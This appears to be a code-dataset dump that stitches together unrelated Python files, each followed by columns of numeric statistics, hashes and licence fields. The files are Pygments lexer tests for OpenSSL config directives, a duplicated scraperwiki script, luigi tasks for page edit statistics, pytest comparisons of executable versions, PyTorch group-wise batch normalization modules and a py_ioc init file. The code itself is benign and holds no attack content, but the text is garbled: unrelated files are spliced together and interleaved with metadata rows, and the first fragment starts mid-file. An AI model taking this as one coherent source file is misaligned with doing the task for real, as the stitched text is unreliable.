self.assertEqual(tokens[2], (token.Name.Attribute, '.directive'))
self.assertEqual(tokens[3], (T_SPACE, ' '))
self.assertEqual(tokens[4], (token.String, 'foo'))
self.assertEqual(tokens[5], (T_SPACE, '\n'))
def test_lex_incomplete_directive_and_operator(self):
from pygments import token
tokens = self.lex('.directive =\n', 'openssl')
self.assertEqual(tokens[0], (token.Name.Attribute, '.directive'))
self.assertEqual(tokens[1], (T_SPACE, ' '))
self.assertEqual(tokens[2], (token.Operator, '='))
self.assertEqual(tokens[3], (T_SPACE, '\n'))
tokens = self.lex('.directive =\n.directive = foo\n', 'openssl')
self.assertEqual(tokens[0], (token.Name.Attribute, '.directive'))
self.assertEqual(tokens[1], (T_SPACE, ' '))
self.assertEqual(tokens[2], (token.Operator, '='))
self.assertEqual(tokens[3], (T_SPACE, '\n'))
self.assertEqual(tokens[4], (token.Name.Attribute, '.directive'))
self.assertEqual(tokens[5], (T_SPACE, ' '))
self.assertEqual(tokens[6], (token.Operator, '='))
self.assertEqual(tokens[7], (T_SPACE, ' '))
self.assertEqual(tokens[8], (token.String, 'foo'))
self.assertEqual(tokens[9], (T_SPACE, '\n'))
def test_lex_incomplete_directive_string(self):
from pygments import token
tokens = self.lex('.directive', 'openssl')
self.assertEqual(tokens[0], (token.Name.Attribute, '.directive'))
tokens = self.lex('.directive\n.directive foo', 'openssl')
self.assertEqual(tokens[0], (token.Name.Attribute, '.directive'))
self.assertEqual(tokens[1], (T_SPACE, '\n'))
self.assertEqual(tokens[2], (token.Name.Attribute, '.directive'))
self.assertEqual(tokens[3], (T_SPACE, ' '))
self.assertEqual(tokens[4], (token.String, 'foo'))
class PragmaDirectiveLexerTests(unittest.TestCase):
def lex(self, code, lexer_name):
from pygments import lex, lexers
return list(lex(code, lexers.get_lexer_by_name(lexer_name)))
def test_lex_pragma_directive(self):
from pygments import token
tokens = self.lex('.pragma foo\n', 'openssl')
self.assertEqual(tokens[0], (token.Name.Builtin, '.pragma'))
self.assertEqual(tokens[1], (T_SPACE, ' '))
self.assertEqual(tokens[2], (token.String, 'foo'))
self.assertEqual(tokens[3], (T_SPACE, '\n'))
def test_lex_pragma_directive_and_operator(self):
from pygments import token
tokens = self.lex('.pragma = foo\n', 'openssl')
self.assertEqual(tokens[0], (token.Name.Builtin, '.pragma'))
self.assertEqual(tokens[1], (T_SPACE, ' '))
self.assertEqual(tokens[2], (token.Operator, '='))
self.assertEqual(tokens[3], (T_SPACE, ' '))
self.assertEqual(tokens[4], (token.String, 'foo'))
self.assertEqual(tokens[5], (T_SPACE, '\n'))
def test_lex_pragma_directive_with_leading_whitespace(self):
from pygments import token
tokens = self.lex(' .pragma foo\n', 'openssl')
self.assertEqual(tokens[0], (T_SPACE, ' '))
self.assertEqual(tokens[1], (token.Name.Builtin, '.pragma'))
self.assertEqual(tokens[2], (T_SPACE, ' '))
self.assertEqual(tokens[3], (token.String, 'foo'))
self.assertEqual(tokens[4], (T_SPACE, '\n'))
def test_lex_pragma_directive_name(self):
from pygments import token
tokens = self.lex('.pragma abspath:\n', 'openssl')
self.assertEqual(tokens[0], (token.Name.Builtin, '.pragma'))
self.assertEqual(tokens[1], (T_SPACE, ' '))
self.assertEqual(tokens[2], (token.Keyword.Pseudo, 'abspath'))
self.assertEqual(tokens[3], (token.Operator, ':'))
def test_lex_pragma_directive_name_and_operator(self):
from pygments import token
tokens = self.lex('.pragma = abspath:\n', 'openssl')
self.assertEqual(tokens[0], (token.Name.Builtin, '.pragma'))
self.assertEqual(tokens[1], (T_SPACE, ' '))
self.assertEqual(tokens[2], (token.Operator, '='))
self.assertEqual(tokens[3], (T_SPACE, ' '))
self.assertEqual(tokens[4], (token.Keyword.Pseudo, 'abspath'))
self.assertEqual(tokens[5], (token.Operator, ':'))
def test_lex_pragma_directive_name_and_value(self):
from pygments import token
tokens = self.lex('.pragma abspath:bar\n', 'openssl')
self.assertEqual(tokens[0], (token.Name.Builtin, '.pragma'))
self.assertEqual(tokens[1], (T_SPACE, ' '))
self.assertEqual(tokens[2], (token.Keyword.Pseudo, 'abspath'))
self.assertEqual(tokens[3], (token.Operator, ':'))
self.assertEqual(tokens[4], (token.String, 'bar'))
self.assertEqual(tokens[5], (T_SPACE, '\n'))
def test_lex_pragma_directive_name_and_value_with_colon(self):
from pygments import token
tokens = self.lex('.pragma abspath:bar:baz\n', 'openssl')
self.assertEqual(tokens[0], (token.Name.Builtin, '.pragma'))
self.assertEqual(tokens[1], (T_SPACE, ' '))
self.assertEqual(tokens[2], (token.Keyword.Pseudo, 'abspath'))
self.assertEqual(tokens[3], (token.Operator, ':'))
self.assertEqual(tokens[4], (token.String, 'bar:baz'))
self.assertEqual(tokens[5], (T_SPACE, '\n'))
def test_lex_incomplete_pragma_directive(self):
from pygments import token
tokens = self.lex('.pragma\n', 'openssl')
self.assertEqual(tokens[0], (token.Name.Builtin, '.pragma'))
self.assertEqual(tokens[1], (T_SPACE, '\n'))
tokens = self.lex('.pragma\n.pragma foo\n', 'openssl')
self.assertEqual(tokens[0], (token.Name.Builtin, '.pragma'))
self.assertEqual(tokens[1], (T_SPACE, '\n'))
self.assertEqual(tokens[2], (token.Name.Builtin, '.pragma'))
self.assertEqual(tokens[3], (T_SPACE, ' '))
self.assertEqual(tokens[4], (token.String, 'foo'))
self.assertEqual(tokens[5], (T_SPACE, '\n'))
def test_lex_incomplete_pragma_directive_and_operator(self):
from pygments import token
tokens = self.lex('.pragma =\n', 'openssl')
self.assertEqual(tokens[0], (token.Name.Builtin, '.pragma'))
self.assertEqual(tokens[1], (T_SPACE, ' '))
self.assertEqual(tokens[2], (token.Operator, '='))
self.assertEqual(tokens[3], (T_SPACE, '\n'))
tokens = self.lex('.pragma =\n.pragma = foo\n', 'openssl')
self.assertEqual(tokens[0], (token.Name.Builtin, '.pragma'))
self.assertEqual(tokens[1], (T_SPACE, ' '))
self.assertEqual(tokens[2], (token.Operator, '='))
self.assertEqual(tokens[3], (T_SPACE, '\n'))
self.assertEqual(tokens[4], (token.Name.Builtin, '.pragma'))
self.assertEqual(tokens[5], (T_SPACE, ' '))
self.assertEqual(tokens[6], (token.Operator, '='))
self.assertEqual(tokens[7], (T_SPACE, ' '))
self.assertEqual(tokens[8], (token.String, 'foo'))
self.assertEqual(tokens[9], (T_SPACE, '\n'))
def test_lex_incomplete_pragma_directive_string(self):
from pygments import token
tokens = self.lex('.pragma', 'openssl')
self.assertEqual(tokens[0], (token.Name.Builtin, '.pragma'))
tokens = self.lex('.pragma\n.pragma foo', 'openssl')
self.assertEqual(tokens[0], (token.Name.Builtin, '.pragma'))
self.assertEqual(tokens[1], (T_SPACE, '\n'))
self.assertEqual(tokens[2], (token.Name.Builtin, '.pragma'))
self.assertEqual(tokens[3], (T_SPACE, ' '))
self.assertEqual(tokens[4], (token.String, 'foo'))
class IncludeDirectiveLexerTests(unittest.TestCase):
def lex(self, code, lexer_name):
from pygments import lex, lexers
return list(lex(code, lexers.get_lexer_by_name(lexer_name)))
def test_lex_include_directive(self):
from pygments import token
tokens = self.lex('.include foo\n', 'openssl')
self.assertEqual(tokens[0], (token.Name.Builtin, '.include'))
self.assertEqual(tokens[1], (T_SPACE, ' '))
self.assertEqual(tokens[2], (token.String, 'foo'))
self.assertEqual(tokens[3], (T_SPACE, '\n'))
def test_lex_include_directive_and_operator(self):
from pygments import token
tokens = self.lex('.include = foo\n', 'openssl')
self.assertEqual(tokens[0], (token.Name.Builtin, '.include'))
self.assertEqual(tokens[1], (T_SPACE, ' '))
self.assertEqual(tokens[2], (token.Operator, '='))
self.assertEqual(tokens[3], (T_SPACE, ' '))
self.assertEqual(tokens[4], (token.String, 'foo'))
self.assertEqual(tokens[5], (T_SPACE, '\n'))
def test_lex_include_directive_with_leading_whitespace(self):
from pygments import token
tokens = self.lex(' .include foo\n', 'openssl')
self.assertEqual(tokens[0], (T_SPACE, ' '))
self.assertEqual(tokens[1], (token.Name.Builtin, '.include'))
self.assertEqual(tokens[2], (T_SPACE, ' '))
self.assertEqual(tokens[3], (token.String, 'foo'))
self.assertEqual(tokens[4], (T_SPACE, '\n'))
def test_lex_incomplete_include_directive(self):
from pygments import token
tokens = self.lex('.include\n', 'openssl')
self.assertEqual(tokens[0], (token.Name.Builtin, '.include'))
self.assertEqual(tokens[1], (T_SPACE, '\n'))
tokens = self.lex('.include\n.include foo\n', 'openssl')
self.assertEqual(tokens[0], (token.Name.Builtin, '.include'))
self.assertEqual(tokens[1], (T_SPACE, '\n'))
self.assertEqual(tokens[2], (token.Name.Builtin, '.include'))
self.assertEqual(tokens[3], (T_SPACE, ' '))
self.assertEqual(tokens[4], (token.String, 'foo'))
self.assertEqual(tokens[5], (T_SPACE, '\n'))
def test_lex_incomplete_include_directive_and_operator(self):
from pygments import token
tokens = self.lex('.include =\n', 'openssl')
self.assertEqual(tokens[0], (token.Name.Builtin, '.include'))
self.assertEqual(tokens[1], (T_SPACE, ' '))
self.assertEqual(tokens[2], (token.Operator, '='))
self.assertEqual(tokens[3], (T_SPACE, '\n'))
tokens = self.lex('.include =\n.include = foo\n', 'openssl')
self.assertEqual(tokens[0], (token.Name.Builtin, '.include'))
self.assertEqual(tokens[1], (T_SPACE, ' '))
self.assertEqual(tokens[2], (token.Operator, '='))
self.assertEqual(tokens[3], (T_SPACE, '\n'))
self.assertEqual(tokens[4], (token.Name.Builtin, '.include'))
self.assertEqual(tokens[5], (T_SPACE, ' '))
self.assertEqual(tokens[6], (token.Operator, '='))
self.assertEqual(tokens[7], (T_SPACE, ' '))
self.assertEqual(tokens[8], (token.String, 'foo'))
self.assertEqual(tokens[9], (T_SPACE, '\n'))
def test_lex_incomplete_include_directive_string(self):
from pygments import token
tokens = self.lex('.include', 'openssl')
self.assertEqual(tokens[0], (token.Name.Builtin, '.include'))
tokens = self.lex('.include\n.include foo', 'openssl')
self.assertEqual(tokens[0], (token.Name.Builtin, '.include'))
self.assertEqual(tokens[1], (T_SPACE, '\n'))
self.assertEqual(tokens[2], (token.Name.Builtin, '.include'))
self.assertEqual(tokens[3], (T_SPACE, ' '))
self.assertEqual(tokens[4], (token.String, 'foo'))
| 44.229706
| 78
| 0.61248
| 3,081
| 25,609
| 4.977929
| 0.029211
| 0.295364
| 0.41351
| 0.112278
| 0.976397
| 0.971116
| 0.96603
| 0.949795
| 0.925148
| 0.877355
| 0
| 0.015521
| 0.204967
| 25,609
| 578
| 79
| 44.306228
| 0.73777
| 0
| 0
| 0.719222
| 0
| 0
| 0.088566
| 0.001718
| 0
| 0
| 0
| 0
| 0.652268
| 1
| 0.099352
| false
| 0
| 0.103672
| 0
| 0.220302
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
e266a4dd685f7a44198b8b2e69e0b9f5243a9772
| 516
|
py
|
Python
|
data/train/python/e266a4dd685f7a44198b8b2e69e0b9f5243a9772toms_sql_test_scraper.py
|
harshp8l/deep-learning-lang-detection
|
2a54293181c1c2b1a2b840ddee4d4d80177efb33
|
[
"MIT"
] | 84
|
2017-10-25T15:49:21.000Z
|
2021-11-28T21:25:54.000Z
|
data/train/python/e266a4dd685f7a44198b8b2e69e0b9f5243a9772toms_sql_test_scraper.py
|
vassalos/deep-learning-lang-detection
|
cbb00b3e81bed3a64553f9c6aa6138b2511e544e
|
[
"MIT"
] | 5
|
2018-03-29T11:50:46.000Z
|
2021-04-26T13:33:18.000Z
|
data/train/python/e266a4dd685f7a44198b8b2e69e0b9f5243a9772toms_sql_test_scraper.py
|
vassalos/deep-learning-lang-detection
|
cbb00b3e81bed3a64553f9c6aa6138b2511e544e
|
[
"MIT"
] | 24
|
2017-11-22T08:31:00.000Z
|
2022-03-27T01:22:31.000Z
|
# -*- coding: utf8 -*-
import scraperwiki
scraperwiki.sqlite.save(['name'], {'name': 'Tom'})
scraperwiki.sqlite.save(['name'], {'name': 'Dick'})
scraperwiki.sqlite.save(['name'], {'name': 'Harry'})
scraperwiki.sqlite.save(['name'], {'name': 'Məclisi'})
# -*- coding: utf8 -*-
import scraperwiki
scraperwiki.sqlite.save(['name'], {'name': 'Tom'})
scraperwiki.sqlite.save(['name'], {'name': 'Dick'})
scraperwiki.sqlite.save(['name'], {'name': 'Harry'})
scraperwiki.sqlite.save(['name'], {'name': 'Məclisi'})
| 22.434783
| 54
| 0.627907
| 56
| 516
| 5.785714
| 0.196429
| 0.419753
| 0.518519
| 0.617284
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0.004274
| 0.093023
| 516
| 22
| 55
| 23.454545
| 0.688034
| 0.079457
| 0
| 1
| 0
| 0
| 0.216102
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.2
| 0
| 0.2
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
e2b5520566fdc720522151563fc6e1c3695c9078
| 147
|
py
|
Python
|
tests/rapid_clay_formations_fab/test_nothing.py
|
gramaziokohler/rapid_clay_formations_fab
|
a8f9b32486d83a3e066eaadaa41bd4dab822c1cd
|
[
"MIT"
] | null | null | null |
tests/rapid_clay_formations_fab/test_nothing.py
|
gramaziokohler/rapid_clay_formations_fab
|
a8f9b32486d83a3e066eaadaa41bd4dab822c1cd
|
[
"MIT"
] | 35
|
2020-10-24T20:22:31.000Z
|
2022-02-28T13:05:10.000Z
|
tests/rapid_clay_formations_fab/test_nothing.py
|
gramaziokohler/rapid_clay_formations_fab
|
a8f9b32486d83a3e066eaadaa41bd4dab822c1cd
|
[
"MIT"
] | 2
|
2020-10-15T09:13:27.000Z
|
2020-10-27T09:22:03.000Z
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
def test_nothing():
assert True
| 18.375
| 38
| 0.829932
| 19
| 147
| 5.631579
| 0.631579
| 0.280374
| 0.448598
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.14966
| 147
| 7
| 39
| 21
| 0.856
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.2
| 1
| 0.2
| true
| 0
| 0.6
| 0
| 0.8
| 0.2
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
2c60115991eea676bd9f2889782b320f4312cbe9
| 2,548
|
py
|
Python
|
tasks/calculators/page.py
|
ayarov/SubjectMatterExpertise
|
d7e5cbfa42c2bc92bf528e213d361c209e741f1b
|
[
"MIT"
] | null | null | null |
tasks/calculators/page.py
|
ayarov/SubjectMatterExpertise
|
d7e5cbfa42c2bc92bf528e213d361c209e741f1b
|
[
"MIT"
] | null | null | null |
tasks/calculators/page.py
|
ayarov/SubjectMatterExpertise
|
d7e5cbfa42c2bc92bf528e213d361c209e741f1b
|
[
"MIT"
] | null | null | null |
import os
import luigi
import pandas as pd
from tasks.collectors.revision import CollectRevisions
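# Each task below reads the revision dump produced by CollectRevisions, groups it by page_id with
# pandas, and writes a two-column HDF5 file: first edit date (min timestamp), last edit date
# (max timestamp) or total edit count per page.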
class CalculatePageFirstEditDate(luigi.Task):
file_name = 'page_first_edit_date.h5'
data_dir = luigi.Parameter(default=r'../../data/sme')
def output(self):
return luigi.LocalTarget(path=os.path.join(self.data_dir, self.file_name), format='h5')
def requires(self):
return [CollectRevisions(data_dir=self.data_dir)]
def run(self):
revs_df = pd.read_hdf(self.input()[0].path, mode='r')
if isinstance(revs_df, pd.DataFrame):
grouped = revs_df.groupby(by='page_id')
data = []
for page_id, group in grouped:
data.append([page_id, group['timestamp'].min()])
df = pd.DataFrame(data=data, columns=['page_id', 'first_edit_date'])
df.to_hdf(os.path.join(self.data_dir, self.file_name), key='df', mode='w')
class CalculatePageLastEditDate(luigi.Task):
file_name = 'page_last_edit_date.h5'
data_dir = luigi.Parameter(default=r'D:\data\sme')
def output(self):
return luigi.LocalTarget(path=os.path.join(self.data_dir, self.file_name), format='h5')
def requires(self):
return [CollectRevisions(data_dir=self.data_dir)]
def run(self):
revs_df = pd.read_hdf(self.input()[0].path, mode='r')
if isinstance(revs_df, pd.DataFrame):
grouped = revs_df.groupby(by='page_id')
data = []
for page_id, group in grouped:
data.append([page_id, group['timestamp'].max()])
df = pd.DataFrame(data=data, columns=['page_id', 'last_edit_date'])
df.to_hdf(os.path.join(self.data_dir, self.file_name), key='df', mode='w')
class CalculatePageTotalEdits(luigi.Task):
file_name = 'page_total_edits.h5'
data_dir = luigi.Parameter(default=r'D:\data\sme')
def output(self):
return luigi.LocalTarget(path=os.path.join(self.data_dir, self.file_name), format='h5')
def requires(self):
return [CollectRevisions(data_dir=self.data_dir)]
def run(self):
revs_df = pd.read_hdf(self.input()[0].path, mode='r')
if isinstance(revs_df, pd.DataFrame):
grouped = revs_df.groupby(by='page_id')
data = []
for page_id, group in grouped:
data.append([page_id, len(group)])
df = pd.DataFrame(data=data, columns=['page_id', 'total_edits'])
df.to_hdf(os.path.join(self.data_dir, self.file_name), key='df', mode='w')
| 37.470588
| 95
| 0.634615
| 358
| 2,548
| 4.337989
| 0.192737
| 0.067611
| 0.063748
| 0.054089
| 0.861558
| 0.820992
| 0.820992
| 0.820992
| 0.755312
| 0.725048
| 0
| 0.004523
| 0.218995
| 2,548
| 67
| 96
| 38.029851
| 0.775879
| 0
| 0
| 0.673077
| 0
| 0
| 0.085557
| 0.017661
| 0
| 0
| 0
| 0
| 0
| 1
| 0.173077
| false
| 0
| 0.076923
| 0.115385
| 0.538462
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 8
|
e2bd29b4fea59c33680a06d84a429ec95cb7b822
| 1,768
|
py
|
Python
|
tests/test_updater.py
|
yoannmos/Inupdater
|
0c8e7e3f72e9089432a4fac07b1206f395b7baab
|
[
"MIT"
] | null | null | null |
tests/test_updater.py
|
yoannmos/Inupdater
|
0c8e7e3f72e9089432a4fac07b1206f395b7baab
|
[
"MIT"
] | 3
|
2021-09-08T06:46:16.000Z
|
2021-09-08T07:38:00.000Z
|
tests/test_updater.py
|
yoannmos/Inupdater
|
0c8e7e3f72e9089432a4fac07b1206f395b7baab
|
[
"MIT"
] | null | null | null |
"""Updater Test File"""
import pytest
from inupdater.updater import Exefile
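# As asserted below, Exefile instances compare by version rather than path: two files with the same
# version are equal, and the ordering operators (<, <=, >, >=) follow the version numbers.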
class TestExefile:
def test_equal_pass(self):
exe_dict_1 = {
"path": "appexemple",
"version": "0.0.1",
}
exe_dict_2 = {
"path": "appexemple1",
"version": "0.0.1",
}
exe_1 = Exefile(**exe_dict_1)
exe_2 = Exefile(**exe_dict_2)
assert exe_1 == exe_2
def test_lt_pass(self):
exe_dict_1 = {
"path": "appexemple",
"version": "0.0.1",
}
exe_dict_2 = {
"path": "appexemple1",
"version": "0.0.2",
}
exe_1 = Exefile(**exe_dict_1)
exe_2 = Exefile(**exe_dict_2)
assert exe_1 < exe_2
def test_le_pass(self):
exe_dict_1 = {
"path": "appexemple",
"version": "0.0.1",
}
exe_dict_2 = {
"path": "appexemple1",
"version": "0.0.2",
}
exe_1 = Exefile(**exe_dict_1)
exe_2 = Exefile(**exe_dict_2)
assert exe_1 <= exe_2
def test_gt_pass(self):
exe_dict_1 = {
"path": "appexemple",
"version": "0.1.8",
}
exe_dict_2 = {
"path": "appexemple1",
"version": "0.0.2",
}
exe_1 = Exefile(**exe_dict_1)
exe_2 = Exefile(**exe_dict_2)
assert exe_1 > exe_2
def test_ge_pass(self):
exe_dict_1 = {
"path": "appexemple",
"version": "8.5.1",
}
exe_dict_2 = {
"path": "appexemple1",
"version": "8.4.9",
}
exe_1 = Exefile(**exe_dict_1)
exe_2 = Exefile(**exe_dict_2)
assert exe_1 >= exe_2
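The tests only exercise comparison semantics: two Exefile objects compare by version and ignore path. The real class lives in inupdater.updater and is not shown here; the sketch below is a hypothetical stand-in that would satisfy these assertions, using the third-party packaging library for proper semantic version ordering.

from functools import total_ordering
from packaging.version import Version  # assumed available; not part of the repo shown above


@total_ordering
class Exefile:
    """Hypothetical stand-in: ordering is driven solely by the parsed version."""

    def __init__(self, path, version):
        self.path = path
        self.version = Version(version)

    def __eq__(self, other):
        return self.version == other.version

    def __lt__(self, other):
        return self.version < other.version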
| 24.555556
| 37
| 0.463235
| 212
| 1,768
| 3.533019
| 0.150943
| 0.186916
| 0.106809
| 0.100134
| 0.862483
| 0.861148
| 0.861148
| 0.81976
| 0.77036
| 0.719626
| 0
| 0.070093
| 0.394796
| 1,768
| 71
| 38
| 24.901408
| 0.629907
| 0.009615
| 0
| 0.587302
| 0
| 0
| 0.151862
| 0
| 0
| 0
| 0
| 0
| 0.079365
| 1
| 0.079365
| false
| 0.079365
| 0.031746
| 0
| 0.126984
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
e2dec239eb5fa5cdb4e6239179497d15dc75a02a
| 7,619
|
py
|
Python
|
Small_BatchNorm.py
|
wang3702/barlowtwins
|
6d1dc9d31f8f3c87fa4148b7dada0fe9e34805d1
|
[
"MIT"
] | null | null | null |
Small_BatchNorm.py
|
wang3702/barlowtwins
|
6d1dc9d31f8f3c87fa4148b7dada0fe9e34805d1
|
[
"MIT"
] | null | null | null |
Small_BatchNorm.py
|
wang3702/barlowtwins
|
6d1dc9d31f8f3c87fa4148b7dada0fe9e34805d1
|
[
"MIT"
] | null | null | null |
import torch
import torch.nn as nn
import torch.distributed as dist
class Small_BatchNorm(nn.Module):
def __init__(self,
num_group,
num_features,
eps=1e-05,
momentum=0.1,
affine=True,
track_running_stats=True):
super(Small_BatchNorm, self).__init__()
self.num_group = num_group
self.num_features = num_features
self.eps = eps
self.momentum = momentum
self.affine = affine
self.track_running_stats = track_running_stats
        # G*C normalization weight and bias parameters
if self.affine:
            self.weight = nn.Parameter(torch.ones([num_features]))  # only the C dimension is kept
self.bias = nn.Parameter(torch.zeros([num_features]))
else:
self.register_parameter('weight', None)
self.register_parameter('bias', None)
if self.track_running_stats:
self.register_buffer('running_mean', torch.zeros([1,self.num_group,num_features]))
self.register_buffer('running_var', torch.ones([1,self.num_group,num_features]))
else:
self.register_buffer('running_mean', None)
self.register_buffer('running_var', None)
self.reset_parameters()
def extra_repr(self):
return 'num_groups={}, num_features={}, eps={}, momentum={}'.\
format(self.num_group, self.num_features, self.eps, self.momentum)
def reset_parameters(self):
if self.affine:
self.weight.data.fill_(1)
self.bias.data.zero_()
if self.track_running_stats:
self.running_mean.zero_()
self.running_var.fill_(1)
def normalize(self, input):
"""
input shape
N*C
Args:
input:
Returns:
"""
cur_batch_size, num_features = input.shape
input = torch.reshape(input, (-1, self.num_group, self.num_features)) # (N, G, C)
var, mean = torch.var_mean(input, dim=0, keepdim=True, unbiased=False)
input = (input - mean) / torch.sqrt(var + self.eps)
if self.track_running_stats:
self.running_mean = self.running_mean * (1. - self.momentum) + mean.detach() * self.momentum
self.running_var = self.running_var * (1. - self.momentum) + var.detach() * self.momentum
if self.affine:
input = input * self.weight + self.bias
input = input.view(cur_batch_size,num_features)
return input
def normalize_bn(self,input):
var, mean = torch.var_mean(input, dim=0, keepdim=True, unbiased=False)
input = (input - mean) / torch.sqrt(var + self.eps)
if self.track_running_stats:
self.running_mean = self.running_mean * (1. - self.momentum) + mean[None,:,:].detach() * self.momentum
self.running_var = self.running_var * (1. - self.momentum) + var[None,:,:].detach() * self.momentum
if self.affine:
input = input * self.weight + self.bias
return input
def forward(self, input,group=True):
if group:
return self.normalize(input)
else:
return self.normalize_bn(input)
class Small_BatchNormSN(nn.Module):
def __init__(self,
num_group,
num_features,
eps=1e-05,
momentum=0.1,
affine=True,
track_running_stats=True):
super(Small_BatchNormSN, self).__init__()
self.num_group = num_group
self.num_features = num_features
self.eps = eps
self.momentum = momentum
self.affine = affine
self.track_running_stats = track_running_stats
        # G*C normalization weight and bias parameters
if self.affine:
            self.weight = nn.Parameter(torch.ones([num_features]))  # only the C dimension is kept
self.bias = nn.Parameter(torch.zeros([num_features]))
else:
self.register_parameter('weight', None)
self.register_parameter('bias', None)
if self.track_running_stats:
self.register_buffer('running_mean', torch.zeros([self.num_group,1,num_features]))
self.register_buffer('running_var', torch.ones([self.num_group,1,num_features]))
else:
self.register_buffer('running_mean', None)
self.register_buffer('running_var', None)
self.reset_parameters()
def extra_repr(self):
return 'num_groups={}, num_features={}, eps={}, momentum={}'.\
format(self.num_group, self.num_features, self.eps, self.momentum)
def reset_parameters(self):
if self.affine:
self.weight.data.fill_(1)
self.bias.data.zero_()
if self.track_running_stats:
self.running_mean.zero_()
self.running_var.fill_(1)
def normalize(self, input):
"""
input shape
N*C
Args:
input:
Returns:
"""
if len(input.shape)==2:
mode=0
cur_batch_size, num_features = input.shape
input = torch.reshape(input,
(self.num_group, cur_batch_size // self.num_group, self.num_features)) # (G,N, C)
elif len(input.shape)==3:
mode=1
cur_batch_size, num_features,height = input.shape
input = torch.reshape(input,
(self.num_group, cur_batch_size // self.num_group, self.num_features,height)) # (G,N, C,H)
elif len(input.shape)==4:
mode=2
cur_batch_size, num_features, height,width = input.shape
input = torch.reshape(input,
(self.num_group, cur_batch_size // self.num_group, self.num_features,
height,width)) # (G,N, C,H,W)
else:
print("input shape is not suppored: ",input.shape)
print("only support 2D, 3D, 4D shape tensor for normalization")
exit()
if mode==0:
var, mean = torch.var_mean(input, dim=1, keepdim=True, unbiased=False)
elif mode==1:
var, mean = torch.var_mean(input, dim=[1,3], keepdim=True, unbiased=False)
else:
var, mean = torch.var_mean(input, dim=[1,3,4], keepdim=True, unbiased=False)
input = (input - mean) / torch.sqrt(var + self.eps)
if self.track_running_stats:
if mode==1:
mean = mean[:,:,:,0]
var = var[:,:,:,0]
elif mode==2:
mean = mean[:, :, :, 0,0]
var = var[:, :, :, 0,0]
self.running_mean = self.running_mean * (1. - self.momentum) + mean.detach() * self.momentum
self.running_var = self.running_var * (1. - self.momentum) + var.detach() * self.momentum
if mode==0:
input = input.view(cur_batch_size,num_features)
elif mode==1:
input = input.view(cur_batch_size, num_features,height)
elif mode==2:
input = input.view(cur_batch_size, num_features, height,width)
if self.affine:
if mode==0:
input = input * self.weight + self.bias
elif mode==1:
input = input * self.weight[None, :, None] + self.bias[None, :, None]
elif mode==2:
input = input * self.weight[None, :, None,None] + self.bias[None, :, None,None]
return input
def forward(self, input):
return self.normalize(input)
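A quick usage sketch (assumed, not taken from the repository): both modules require the batch dimension to be divisible by num_group, because the input is reshaped into per-group blocks before statistics are computed.

import torch

bn = Small_BatchNorm(num_group=4, num_features=128)
x = torch.randn(32, 128)         # 32 samples, 128 features; 32 is divisible by num_group
y = bn(x, group=True)            # group-wise statistics, shape preserved: (32, 128)
y_plain = bn(x, group=False)     # falls back to plain batch-norm statistics

sn = Small_BatchNormSN(num_group=4, num_features=64)
z = sn(torch.randn(32, 64, 7, 7))  # 4D input is handled by the mode==2 branch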
| 36.280952
| 125
| 0.56766
| 919
| 7,619
| 4.51469
| 0.108814
| 0.079537
| 0.049168
| 0.045553
| 0.862618
| 0.851048
| 0.781634
| 0.772234
| 0.74765
| 0.689805
| 0
| 0.01113
| 0.316052
| 7,619
| 209
| 126
| 36.454545
| 0.78507
| 0.031106
| 0
| 0.708861
| 0
| 0
| 0.040909
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.06962
| false
| 0
| 0.018987
| 0.018987
| 0.151899
| 0.012658
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e2f990c73be35297ebe083a648a9e12e43a3cc95
| 112
|
py
|
Python
|
py_ioc/__init__.py
|
sha31dev/py_ioc
|
755fd434a409e4bc6ca7bd5969d9b9d13739b8d3
|
[
"MIT"
] | null | null | null |
py_ioc/__init__.py
|
sha31dev/py_ioc
|
755fd434a409e4bc6ca7bd5969d9b9d13739b8d3
|
[
"MIT"
] | null | null | null |
py_ioc/__init__.py
|
sha31dev/py_ioc
|
755fd434a409e4bc6ca7bd5969d9b9d13739b8d3
|
[
"MIT"
] | null | null | null |
from py_ioc.src.container import Container
from py_ioc.src.scope import Scope
from py_ioc.src.main import build
| 28
| 42
| 0.839286
| 21
| 112
| 4.333333
| 0.428571
| 0.197802
| 0.296703
| 0.395604
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.107143
| 112
| 3
| 43
| 37.333333
